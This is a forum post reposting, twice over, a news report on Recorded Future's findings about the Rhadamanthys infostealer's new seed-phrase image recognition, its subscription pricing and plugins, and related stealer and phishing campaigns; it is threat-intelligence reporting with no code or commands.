Man
Professional
- Messages
- 3,070
- Reaction score
- 606
- Points
- 113
Criminals are actively mastering new techniques, creating non-standard malware.
Researchers from Recorded Future have discovered that the threat actors behind the Rhadamanthys malware have added new artificial intelligence (AI)-based capabilities. A new feature called Seed Phrase Image Recognition allows software to extract crypto wallet seed phrases from images, posing a serious threat to cryptocurrency users.
In other words, the Rhadamanthys malware is now able to identify images with the seed phrases of crypto wallets on the victim's device and send them to the command and control server for further exploitation. This opportunity increases the risk of theft of funds from cryptocurrency wallets.
Launched in September 2022, Rhadamanthys has quickly become one of the most powerful infostealers in the malware-as-a-service (MaaS) market. Despite bans on some underground forums, such as Exploit and XSS, the creator of this software, known as "kingcrete", actively promotes it on Telegram, Jabber and TOX.
The software is sold on a subscription basis for $250 per month or $550 for 90 days, which gives attackers access to confidential information: system data, accounts, crypto wallets, browser passwords, cookies and other data located on infected devices. At the same time, the author Rhadamanthys actively complicates the analysis of his software in the sandbox and other research environments.
The new version 0.7.0, released in June this year, is a significant improvement over version 0.6.0, which was released in February. According to Recorded Future, the author has completely rewritten the client and server software, improved stability, added 30 algorithms for hacking crypto wallets, recognition functions for graphics and PDF documents, and expanded text extraction capabilities to detect many saved phrases.
In addition, the ability to install MSI files to bypass security tools on the victim's device has been introduced. Rhadamanthys also supports a plugin system that extends the functionality with keylogger, crypto clipper, and reverse proxy capabilities.
Experts note that the Rhadamanthys Stealer is popular with cybercriminals due to its rapid development and innovative features. Among other similar infostealers, such as Lumma, Meduza, StealC, Vidar, and WhiteSnake, there has also been a rapid update and introduction of new features, such as collecting cookies from the Chrome browser and bypassing recently introduced security mechanisms.
At the same time, other malicious campaigns, such as Amadey, use various social engineering techniques and phishing sites to obtain victims' credentials. Cybercriminals lure users to fake pages and force them to perform certain actions, such as running PowerShell code, to install and run malware.
Experts warn that constant updates and new tactics used by hackers pose serious risks to internet and cryptocurrency users, reinforcing the need for robust cyber protection and vigilance.
Source
Researchers from Recorded Future have discovered that the threat actors behind the Rhadamanthys malware have added new artificial intelligence (AI)-based capabilities. A new feature called Seed Phrase Image Recognition allows software to extract crypto wallet seed phrases from images, posing a serious threat to cryptocurrency users.
In other words, the Rhadamanthys malware is now able to identify images with the seed phrases of crypto wallets on the victim's device and send them to the command and control server for further exploitation. This opportunity increases the risk of theft of funds from cryptocurrency wallets.
Launched in September 2022, Rhadamanthys has quickly become one of the most powerful infostealers in the malware-as-a-service (MaaS) market. Despite bans on some underground forums, such as Exploit and XSS, the creator of this software, known as "kingcrete", actively promotes it on Telegram, Jabber and TOX.
The software is sold on a subscription basis for $250 per month or $550 for 90 days, which gives attackers access to confidential information: system data, accounts, crypto wallets, browser passwords, cookies and other data located on infected devices. At the same time, the author Rhadamanthys actively complicates the analysis of his software in the sandbox and other research environments.
The new version 0.7.0, released in June this year, is a significant improvement over version 0.6.0, which was released in February. According to Recorded Future, the author has completely rewritten the client and server software, improved stability, added 30 algorithms for hacking crypto wallets, recognition functions for graphics and PDF documents, and expanded text extraction capabilities to detect many saved phrases.
In addition, the ability to install MSI files to bypass security tools on the victim's device has been introduced. Rhadamanthys also supports a plugin system that extends the functionality with keylogger, crypto clipper, and reverse proxy capabilities.
Experts note that the Rhadamanthys Stealer is popular with cybercriminals due to its rapid development and innovative features. Among other similar infostealers, such as Lumma, Meduza, StealC, Vidar, and WhiteSnake, there has also been a rapid update and introduction of new features, such as collecting cookies from the Chrome browser and bypassing recently introduced security mechanisms.
At the same time, other malicious campaigns, such as Amadey, use various social engineering techniques and phishing sites to obtain victims' credentials. Cybercriminals lure users to fake pages and force them to perform certain actions, such as running PowerShell code, to install and run malware.
Experts warn that constant updates and new tactics used by hackers pose serious risks to internet and cryptocurrency users, reinforcing the need for robust cyber protection and vigilance.
Source
